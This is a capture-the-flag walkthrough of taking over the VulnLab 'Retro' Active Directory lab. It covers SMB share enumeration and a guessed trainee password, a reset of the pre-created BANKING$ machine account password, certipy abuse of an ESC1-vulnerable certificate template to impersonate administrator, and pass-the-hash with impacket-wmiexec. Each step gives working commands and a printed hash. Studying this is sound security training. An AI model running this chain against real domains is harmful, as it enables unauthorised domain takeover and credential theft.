This is the Write-up/Walkthrough of the RETRO Active Directory Machine from VULNLAB.
Note: IP is changed in some commands because stopping and starting the machine again gives new IP every time.
NMAP SCAN:
53/tcp open domain syn-ack Simple DNS Plus88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2023-08-14 18:32:06Z)135/tcp open msrpc syn-ack Microsoft Windows RPC139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)| ssl-cert: Subject: commonName=DC.retro.vl| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl| Issuer: commonName=retro-DC-CA/domainComponent=retroSNIP445/tcp open microsoft-ds? syn-ack464/tcp open kpasswd5? syn-ack593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)|_ssl-date: TLS randomness does not represent time| ssl-cert: Subject: commonName=DC.retro.vl| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.re3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services| rdp-ntlm-info:| Target_Name: RETRO| NetBIOS_Domain_Name: RETRO| NetBIOS_Computer_Name: DC| DNS_Domain_Name: retro.vl| DNS_Computer_Name: DC.retro.vl| Product_Version: 10.0.20348|_ System_Time: 2023-08-14T18:32:48+00:00|_ssl-date: 2023-08-14T18:33:28+00:00; +2s from scanner time.Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:| p2p-conficker:| Checking for Conficker.C or higher...| Check 1 (port 12722/tcp): CLEAN (Timeout)| Check 2 (port 26063/tcp): CLEAN (Timeout)| Check 3 (port 31296/udp): CLEAN (Timeout)| Check 4 (port 53820/udp): CLEAN (Timeout)|_ 0/4 checks are positive: Host is CLEAN or ports are blocked| smb2-time:| date: 2023-08-14T18:32:49|_ start_date: N/A|_clock-skew: mean: 1s, deviation: 0s, median: 0s| smb2-security-mode:| 3:1:1:|_ Message signing enabled and required
Domain: retro.vl, BIOS Name: DC
Looking for smb share found, there is trainees share only allowed to read without credentials.
found Important.txt file on Trainees share, saying.
Dear Trainees,I know that some of you seemed to struggle with remembering strong and unique passwords.So we decided to bundle every one of you up into one account.Stop bothering us. Please. We have other stuff to do than resetting your password every day.RegardsThe Admins
Message saying that everyone is struggling with strong and unique passwords. so, Admins assign everyone to one account and maybe gave an easy password?
Enumerating users using impacket-lookupsid or lookupsid.py as anonymous user and blank password.
impacket-lookupsid anonymous@10.10.81.153
Users found:
traineeBANKING$jburleyHelpDesktblackkrbtgt
As said in the Important.txt, tried to authenticate to smb with “trainee” username and password “trainee”, now i can read Notes Share.
Logged in using smbclient and downloaded ToDo.txt file
smbclient //10.10.115.87/Notes -U trainee%trainee
Notes saying:
Thomas,after convincing the finance department to get rid of their ancienct banking softwareit is finally time to clean up the mess they made. We should start with the pre createdcomputer account. That one is older than me.BestJames
Looking at the message found that, they talking about pre-created computer account, looking up on google about “pre created computer account” found this blog, which explains and shows how to abuse pre-created computer accounts.
I already found BANKING$ machine account, I tried changing the password of the machine account.
Using changepasswd.py to change the password of BANKING$ machine account with an alternative username and password, and setting the new password for BANKING$ machine account.
python3 changepasswd.py retro.vl/banking$:banking@10.10.81.153 -altuser trainee -altpass trainee -newpass hacker@123
It works, and the password got changed for BANKING$ machine account.
after that, I tried using bloodhound-python using trainee and machine account user, but it was showing a DNS error, looking forward, enumerating for certificates using certipy.
certipy find -u 'banking$'@retro.vl -p hacker@123 -dc-ip 10.10.115.87
cat 20230815033909_Certipy.txt
I found that “RetroClients” certificate is vulnerable for ESC1, as I am authenticating it as a Computer account, and I have Enrollment Rights.
Certificate Templates0Template Name : RetroClientsDisplay Name : Retro ClientsCertificate Authorities : retro-DC-CAEnabled : TrueClient Authentication : TrueEnrollment Agent : FalseAny Purpose : FalseEnrollee Supplies Subject : TrueCertificate Name Flag : EnrolleeSuppliesSubjectExtended Key Usage : Client AuthenticationRequires Manager Approval : FalseRequires Key Archival : FalseAuthorized Signatures Required : 0Validity Period : 1 yearRenewal Period : 6 weeksMinimum RSA Key Length : 4096PermissionsEnrollment PermissionsEnrollment Rights : RETRO.VL\Domain AdminsRETRO.VL\Domain ComputersRETRO.VL\Enterprise AdminsObject Control PermissionsOwner : RETRO.VL\AdministratorWrite Owner Principals : RETRO.VL\Domain AdminsRETRO.VL\Enterprise AdminsRETRO.VL\AdministratorWrite Dacl Principals : RETRO.VL\Domain AdminsRETRO.VL\Enterprise AdminsRETRO.VL\AdministratorWrite Property Principals : RETRO.VL\Domain AdminsRETRO.VL\Enterprise AdminsRETRO.VL\Administrator[!] VulnerabilitiesESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
Requesting certificate for Template “RetroClients”, for Administrator **UPN(User Principal Name) and setting key-size to 4096**, as mentioned “Minimum RSA Key Length”.
Note: Make sure you added dc.retro.vl and retro.vl to /etc/hosts file.
certipy req -u 'banking$'@retro.vl -p 'hacker@123' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator@retro.vl' -dns 'dc.retro.vl' -key-size 4096 -debug
After getting the pfx file (private key), used certipy to authenticate to DC using the private key.
certipy auth -pfx administrator_dc.pfx -dc-ip 10.10.104.45
After Entering command, It asked to Select “UPN” or “DNS Host Name”, selected UPN by entering 0, and got the hash of the administrator account, after that, I tried logging in to RDP using PTH method, but blank password login was not allowed after that tried also evil-winrm, it was also not responding, but still I have many other options to login to administrator account using the hash.
Used impacket-wmiexec to log in as administrator using the PTH(PASS THE HASH) method, and got shell as administrator.
impacket-wmiexec administrator@10.10.104.45 -hashes aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
